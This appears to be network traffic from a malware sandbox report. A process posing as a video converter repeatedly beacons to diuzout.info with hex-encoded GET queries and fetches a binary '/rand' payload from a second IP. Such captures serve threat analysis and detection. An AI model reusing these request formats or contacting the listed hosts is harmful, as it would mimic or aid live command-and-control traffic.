Timestamp: Oct 8, 2024 04:14:11.457354069 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:12.144870996 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 63182 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:12.427371025 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:13.116638899 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 63183 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:13.240716934 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:13.930902004 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 63184 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:14.053086996 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:14.736906052 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 63185 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:14.865211964 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:15.553134918 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 22 | Source IP: 192.168.2.6 | Source Port: 63186 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:15.678229094 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:16.375803947 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 23 | Source IP: 192.168.2.6 | Source Port: 63187 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:16.490117073 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:17.180108070 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 24 | Source IP: 192.168.2.6 | Source Port: 63188 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:17.303303957 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:18.026937962 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 25 | Source IP: 192.168.2.6 | Source Port: 63189 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:18.153985023 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:18.857757092 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 8, 2024 04:14:18.968265057 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:19.213002920 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 26 | Source IP: 192.168.2.6 | Source Port: 63190 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:19.334182978 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:20.022819042 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 27 | Source IP: 192.168.2.6 | Source Port: 63191 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:20.145245075 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:20.838917017 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 28 | Source IP: 192.168.2.6 | Source Port: 63192 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:20.957644939 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:21.653573990 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 8, 2024 04:14:21.765149117 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:22.002862930 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 63193 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:22.129745007 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:22.835819006 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 63194 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:22.958815098 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:23.662949085 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 63196 | 89.105.201.183 | 2023 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:23.779603958 CEST | 57 | IN | GET /rand HTTP/1.1
    Host: 31.214.157.226
    Accept: */*
Oct 8, 2024 04:14:23.953090906 CEST | 765 | OUT | HTTP/1.1 200 OK
    Server: nginx/1.27.0
    Date: Tue, 08 Oct 2024 02:14:23 GMT
    Content-Type: application/octet-stream
    Content-Length: 512
    Last-Modified: Fri, 02 Aug 2024 10:35:15 GMT
    Connection: keep-alive
    ETag: "66acb663-200"
    Accept-Ranges: bytes
    Data Raw: [512-byte binary response body, shown truncated in the original report]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 63195 | 31.214.157.226 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:23.779891968 CEST | 57 | OUT | GET /rand HTTP/1.1
    Host: 31.214.157.226
    Accept: */*
Oct 8, 2024 04:14:23.952656984 CEST | 765 | IN | HTTP/1.1 200 OK
    Server: nginx/1.27.0
    Date: Tue, 08 Oct 2024 02:14:23 GMT
    Content-Type: application/octet-stream
    Content-Length: 512
    Last-Modified: Fri, 02 Aug 2024 10:35:15 GMT
    Connection: keep-alive
    ETag: "66acb663-200"
    Accept-Ranges: bytes
    Data Raw: [512-byte binary response body, shown truncated in the original report]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 63197 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:23.785619020 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:24.481862068 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:24.593991995 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:24.831043005 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 63198 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:24.958009005 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:25.643193960 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 63199 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:25.770982027 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:26.470535040 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 63200 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:26.598190069 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:27.282284975 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 63201 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:27.412652969 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:28.101905107 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 63202 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:28.510845900 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:29.223992109 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 63203 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:29.348284960 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:30.061321974 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
